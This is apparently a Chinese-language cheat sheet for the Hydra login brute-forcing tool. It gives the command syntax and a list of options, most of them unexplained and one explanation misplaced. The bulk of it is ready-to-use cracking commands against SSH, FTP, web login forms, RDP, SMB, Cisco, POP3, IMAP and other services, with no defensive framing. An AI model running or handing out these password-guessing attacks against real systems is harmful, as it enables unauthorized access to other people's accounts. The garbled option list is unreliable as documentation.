hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
參數解釋如下。
- -R
- -S
- -s <port>
- -l <LOGIN>
- -L <FILE>
- -p <PASS>
- -P <FILE>
- -e <ns>
- -C <FILE>
- 使用冒號分割格式,如"admin:123456"來代替-L/-P
- -M <FILE>
- -o <FILE>
- -f
- 在使用-M參數以后,找到第一對登錄名或者密碼的時候中止破解。
- -t <TASKS>
- -w <TIMME>
- -v/-V
- Server
- Servicee
- 指定服務名,支持的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
下面是一些常用服務的破解命令。
1、破解ssh:
hydra -l 用戶名 -P 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -P 密碼字典 -t 線程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用戶名 -P 密碼字典 -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
3、GET/POST方式提交,破解web登錄:
hydra -l 用戶名 -P password_file 127.0.0.1 http-get-form/http-post-form "vulnerabilities/brute/:username=^USER^&password=^PASS^&submit=login:F=Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=xxxxxxx"
說明:引號內的部分是自行構建的參數,這些參數用冒號隔開。第一個參數是接受收據的地址;第二個參數是頁面接受的數據,需要破解的參數用^符號包起來;第三個參數是判斷破解是否成功的標志(F代表錯誤,S代表正確);第四個參數是本次請求中的head cookie。
4、破解https:
hydra -m /index.php -l muts -P pass.txt 127.0.0.1 https
5、破解teamspeak:
hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
6、破解cisco:
hydra -P pass.txt ip cisco
hydra -m cloud -P pass.txt ip cisco-enable
7、破解smb:
hydra -l administrator -P pass.txt ip smb
8、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
9、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
10、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://ip
11、破解imap:
hydra -L user.txt -p secret ip imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN